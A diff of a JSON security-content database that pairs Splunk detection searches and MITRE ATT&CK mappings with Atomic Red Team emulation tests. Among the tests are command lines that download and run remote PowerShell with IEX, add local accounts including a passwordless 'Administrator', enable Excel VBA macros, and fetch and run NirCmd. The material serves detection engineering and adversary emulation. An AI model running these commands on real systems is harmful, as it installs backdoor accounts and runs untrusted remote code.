+ ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1204", + "mitre_attack_technique": "User Execution", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "LAPSUS$" + ] + }, + { + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", + "APT28", + "APT29", + "APT30", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", + "FIN8", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", + "Tonto Team", + "Transparent Tribe", + "Tropic Trooper", + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" + ] + } + ] + } } ], "external_reference": [ @@ -168390,7 +169850,7 @@ { "name": "Active Setup Registry Autostart", "description": "This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"StubPath\" Registry.registry_path = \"*\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"StubPath\" Registry.registry_path = \"*\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter`", "tags": { "name": "Active Setup Registry Autostart", "analytic_story": [ @@ -168407,7 +169867,7 @@ "Installation", "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1547.014", "T1547" @@ -168596,7 +170056,8 @@ "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", "net user $ ATOMIC123! /add /active:yes", "New-LocalUser -Name \"Administrator \" -NoPassword", - "sc.exe create AtomicService binPath= \"C:\\Windows\\System32\\calc.exe\"\nsc sdset AtomicService \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"\n" + "sc.exe create AtomicService binPath= \"C:\\Windows\\System32\\calc.exe\"\nsc sdset AtomicService \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"\n", + "cmd /c \"\\..\\ExternalPayloads\\nircmd.exe\" win child class \"Shell_TrayWnd\" hide class \"TrayClockWClass\"\n" ], "commands": [], "queries": [], @@ -168682,6 +170143,45 @@ "name": "command_prompt", "elevation_required": true } + }, + { + "name": "Command Execution with NirCmd", + "auto_generated_guid": "2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be", + "description": "NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account\nSee https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "nircmd_location": { + "description": "Location of nircmd executable", + "type": "Path", + "default": "PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.exe" + }, + "command_to_execute": { + "description": "Command for nircmd to execute", + "type": "Path", + "default": "win child class \"Shell_TrayWnd\" hide class \"TrayClockWClass\"" + }, + "cleanup_command_to_execute": { + "description": "Cleanup command to undo the arbitrary command ran by nircmd", + "type": "Path", + "default": "win child class \"Shell_TrayWnd\" show class \"TrayClockWClass\"" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The Nircmd executable must exist at (#{nircmd_location})\n", + "prereq_command": "if (Test-Path \"#{nircmd_location}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://www.nirsoft.net/utils/nircmd-x64.zip\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" \nexpand-archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"\n" + } + ], + "executor": { + "command": "cmd /c \"#{nircmd_location}\" #{command_to_execute}\n", + "cleanup_command": "cmd /c \"#{nircmd_location}\" #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null\n", + "name": "powershell", + "elevation_required": false + } } ] } @@ -169777,7 +171277,7 @@ { "name": "Disable Show Hidden Files", "description": "The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", "tags": { "name": "Disable Show Hidden Files", "analytic_story": [ @@ -170153,7 +171653,7 @@ } ], "command_list": [ - "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n" + "start \"$PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\"\n" ], "commands": [], "queries": [], @@ -170185,7 +171685,7 @@ "windows" ], "executor": { - "command": "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n", + "command": "start \"$PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\"\n", "name": "command_prompt" } }, @@ -170522,7 +172022,7 @@ "Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe\n& \"$env:TEMP/PotentiallyUnwanted.exe\"\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macroCode = Get-Content \"/T1204.002/src/test9-GenericPayloadDownload.txt\" -Raw\n$URL = \"#{c2_domain}\" + \"/\" + \"#{c2_parent_directory}\"\n$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt\"\nInvoke-MalDoc -macroCode $macroCode -officeProduct \"Word\"\n", "Invoke-WebRequest -OutFile $env:Temp\\test10.lnk \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk\"\n$file1 = \"$env:Temp\\test10.lnk\"\nStart-Process $file1\nStart-Sleep -s 10\ntaskkill /IM a.exe /F\n", - "Cd \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\"\nNew-ItemProperty -Path Registry::HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security -Name \"VBAWarnings\" -Value \"1\" -PropertyType DWORD -Force | Out-Null\n& '.\\Excel 2016.lnk' PathToAtomicsFolder\\T1204.002\\bin\\mirrorblast_emulation.xlsm" + "Cd \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\"\nNew-ItemProperty -Path Registry::HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security -Name \"VBAWarnings\" -Value \"1\" -PropertyType DWORD -Force | Out-Null\n& '.\\Excel 2016.lnk' \"PathToAtomicsFolder\\T1204.002\\bin\\mirrorblast_emulation.xlsm\"" ], "commands": [], "queries": [], @@ -170842,7 +172342,7 @@ "windows" ], "executor": { - "command": "Cd \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\"\nNew-ItemProperty -Path Registry::HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security -Name \"VBAWarnings\" -Value \"1\" -PropertyType DWORD -Force | Out-Null\n& '.\\Excel 2016.lnk' PathToAtomicsFolder\\T1204.002\\bin\\mirrorblast_emulation.xlsm", + "command": "Cd \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\"\nNew-ItemProperty -Path Registry::HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security -Name \"VBAWarnings\" -Value \"1\" -PropertyType DWORD -Force | Out-Null\n& '.\\Excel 2016.lnk' \"PathToAtomicsFolder\\T1204.002\\bin\\mirrorblast_emulation.xlsm\"", "cleanup_command": "reg delete \"HKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security\" /v \"VBAWarnings\" /f", "name": "powershell" } @@ -171562,6 +173062,346 @@ ] } }, + { + "name": "Suspicious Process Executed From Container File", + "description": "This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common.", + "search": "| tstats `security_content_summariesonly` count values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*.ZIP\\\\*\",\"*.ISO\\\\*\",\"*.IMG\\\\*\",\"*.CAB\\\\*\",\"*.TAR\\\\*\",\"*.GZ\\\\*\",\"*.RAR\\\\*\",\"*.7Z\\\\*\") AND Processes.action=\"allowed\" by Processes.dest Processes.parent_process Processes.process Processes.user| `drop_dm_object_name(Processes)`| regex process=\"(?i).*(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z)\\\\\\\\.+\\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH)\\\"?$\" | rex field=process \"(?i).+\\\\\\\\(?[^\\\\\\]+\\.(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z))\\\\\\\\((.+\\\\\\\\)+)?(?.+\\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH))\\\"?$\"| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_executed_from_container_file_filter`", + "tags": { + "name": "Suspicious Process Executed From Container File", + "analytic_story": [ + "Unusual Processes" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "A suspicious process $process_name$ was launched from $file_name$ on $dest$.", + "mitre_attack_id": [ + "T1204.002", + "T1036.008" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 16, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", + "APT28", + "APT29", + "APT30", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", + "FIN8", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", + "Tonto Team", + "Transparent Tribe", + "Tropic Trooper", + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1036.008", + "mitre_attack_technique": "Masquerade File Type", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Windows Suspect Process With Authentication Traffic", + "description": "This analytic identifies executables running from public or temporary locations that are communicating over windows domain authentication ports/protocol. The ports/protocols include LDAP(389), LDAPS(636), and Kerberos(88). Authentications from applications running from user controlled locations may not be malicious, however actors often attempt to access domain resources after initial compromise from executables in these locations.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.process_id) as process_id from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"88\",\"389\",\"636\") AND All_Traffic.app IN (\"*\\\\users\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip,All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rex field=app \".*\\\\\\(?.*)$\" | rename app as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_suspect_process_with_authentication_traffic_filter`", + "tags": { + "name": "Windows Suspect Process With Authentication Traffic", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "The process $process_name$ on $src$ has been communicating with $dest$ on $dest_port$.", + "mitre_attack_id": [ + "T1087", + "T1087.002", + "T1204", + "T1204.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1204", + "mitre_attack_technique": "User Execution", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "LAPSUS$" + ] + }, + { + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", + "APT28", + "APT29", + "APT30", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", + "FIN8", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", + "Tonto Team", + "Transparent Tribe", + "Tropic Trooper", + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" + ] + } + ] + } + }, { "name": "Windows User Execution Malicious URL Shortcut File", "description": "This analytic will identify suspicious creation of URL shortcut link files. This technique was seen in CHAOS ransomware where it will drop this .url link file in %startup% folder that contains the path of its malicious dropped file to execute upon the reboot of the targeted host. The creation of this file can be created by a normal application or software but it is a good practice to verify this type of file specially the resource it tries to execute which is commonly a website.", @@ -172857,7 +174697,7 @@ { "name": "Azure AD New Custom Domain Added", "description": "The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA.", - "search": " `azuread` body.operationName=\"Add unverified domain\" \"body.properties.result\"=success | rename body.properties.* as * | rename body.callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, body.operationName, callerIpAddress | `azure_ad_new_custom_domain_added_filter`", + "search": " `azuread` operationName=\"Add unverified domain\" \"properties.result\"=success | rename properties.* as * | rename callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, operationName, callerIpAddress | `azure_ad_new_custom_domain_added_filter`", "tags": { "name": "Azure AD New Custom Domain Added", "analytic_story": [ @@ -172915,7 +174755,7 @@ { "name": "Azure AD New Federated Domain Added", "description": "The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA.", - "search": " `azuread` body.operationName=\"Set domain authentication\" \"body.properties.result\"=success | rename body.properties.* as * | rename body.callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, body.operationName, callerIpAddress | `azure_ad_new_federated_domain_added_filter`", + "search": " `azuread` operationName=\"Set domain authentication\" \"properties.result\"=success | rename properties.* as * | rename callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, operationName, callerIpAddress | `azure_ad_new_federated_domain_added_filter`", "tags": { "name": "Azure AD New Federated Domain Added", "analytic_story": [ @@ -173947,7 +175787,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -174119,7 +175959,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -174436,7 +176276,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | 